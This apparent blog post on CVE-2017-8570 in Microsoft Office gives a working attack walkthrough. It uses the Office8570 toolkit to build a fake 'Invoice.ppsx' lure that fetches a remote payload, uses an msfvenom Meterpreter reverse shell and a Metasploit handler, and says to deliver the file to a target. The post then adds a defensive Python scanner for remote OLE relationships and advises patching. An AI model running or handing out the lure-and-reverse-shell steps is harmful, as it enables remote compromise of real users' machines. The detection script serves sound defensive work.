References:
https://www.youtube.com/watch?v=jUhmPH_u6gs
https://github.com/tezukanice/Office8570
https://www.symantec.com/security_response/vulnerability.jsp?bid=99445
https://www.rapid7.com/db/vulnerabilities/msft-cve-2017-8570
Overview: Microsoft Office is prone to a remote code-execution vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts may result in a denial-of-service condition.
Affected versions:
- Microsoft Office 2007 Service Pack 3
- Microsoft Office 2010 Service Pack 2 (32-bit editions)
- Microsoft Office 2010 Service Pack 2 (64-bit editions)
- Microsoft Office 2013 RT Service Pack 1
- Microsoft Office 2013 Service Pack 1 (32-bit editions)
- Microsoft Office 2013 Service Pack 1 (64-bit editions)
- Microsoft Office 2016 (32-bit edition)
- Microsoft Office 2016 (64-bit edition)
cd /tmp
git clone https://github.com/tezukanice/Office8570
cd Office8570
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://<listener IP>/logo.doc
This will fail with a "file not found" message. Just create a template directory and mv the file it asks for into it; the file in question is named in the last line of the error output.
Running the command a second time then succeeds
and produces the Invoice.ppsx file.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<listener IP> LPORT=<listener port> -f exe > /tmp/shell.exe
python cve-2017-8570_toolkit.py -M exp -e http://<listener IP>/shell.exe -l /tmp/shell.exe
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <listener IP>
set LPORT <listener port>
exploit
Deliver Invoice.ppsx to the target; when the target opens this presentation file, you get a session.
The repository at https://github.com/tezukanice/Office8570 documents operating instructions for three different scenarios.
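The Invoice.ppsx produced above does not carry the payload itself; it only holds a reference to the remotely hosted logo.doc, and that external object relationship is what a defender can detect in the file before it is ever opened. The following Python script is an added example, not part of this post or of the Office8570 toolkit: it builds a constructed sample package (the host listener.invalid and file names are placeholders) and walks every relationship part of an OOXML document, reporting oleObject or attachedTemplate relationships marked TargetMode="External" that point at a remote location.

```python
import io
import sys
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
# Relationship types that normally resolve inside the package, not over the network.
RISKY_TYPES = {"oleObject", "attachedTemplate"}
REMOTE_SCHEMES = {"http", "https", "ftp", "file"}


def build_sample_ppsx(remote_ole: bool = True) -> bytes:
    """Constructed test package (not a real exploit document): a minimal OOXML zip
    whose slide .rels holds a normal internal layout link and, when remote_ole is
    True, an oleObject relationship to a hypothetical remote host."""
    rels = [
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
        'officeDocument/2006/relationships/slideLayout" '
        'Target="../slideLayouts/slideLayout1.xml"/>'
    ]
    if remote_ole:
        rels.append(
            '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/'
            'officeDocument/2006/relationships/oleObject" '
            'Target="http://listener.invalid/logo.doc" TargetMode="External"/>'
        )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("ppt/slides/slide1.xml", "<p:sld/>")  # slide body is irrelevant here
        z.writestr(
            "ppt/slides/_rels/slide1.xml.rels",
            '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            + "".join(rels) + "</Relationships>",
        )
    return buf.getvalue()


def is_remote(target: str) -> bool:
    """True for network/file URL schemes and for UNC or protocol-relative paths."""
    if target.startswith("\\\\") or target.startswith("//"):
        return True
    return urlparse(target).scheme.lower() in REMOTE_SCHEMES


def find_external_links(data: bytes) -> list:
    """Return (part, Id, short type, Target) for every relationship in any *.rels
    part that is marked TargetMode="External"."""
    found = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in sorted(z.namelist()):
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(z.read(name))
            except ET.ParseError:
                continue  # malformed rels part; a production scanner should flag this too
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                found.append((name, rel.get("Id", ""), rtype, rel.get("Target", "")))
    return found


def suspicious_links(data: bytes) -> list:
    """External relationships of a risky type whose target is remote."""
    return [link for link in find_external_links(data)
            if link[2] in RISKY_TYPES and is_remote(link[3])]


def is_suspicious(data: bytes) -> bool:
    return bool(suspicious_links(data))


if __name__ == "__main__":
    # Scan the files given on the command line, or the constructed sample if none.
    inputs = [(p, open(p, "rb").read()) for p in sys.argv[1:]]
    inputs = inputs or [("constructed-sample.ppsx", build_sample_ppsx())]
    for label, blob in inputs:
        hits = suspicious_links(blob)
        for part, rid, rtype, target in hits:
            print(f"{label}: {part} {rid} {rtype} -> {target}")
        if not hits:
            print(f"{label}: no remote OLE/template relationships")
```

Because the toolkit's exp step serves the second stage from the listener over HTTP, the delivered document contains nothing but this reference; flagging remote oleObject relationships therefore catches the lure file regardless of which payload is hosted behind it, and it works on docx and xlsx packages as well as ppsx since they share the same relationship format. The check complements, and does not replace, applying the vendor update for the versions listed above.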
Also: apt-get install bleachbit -y
This tool cleans up various caches on a Linux machine.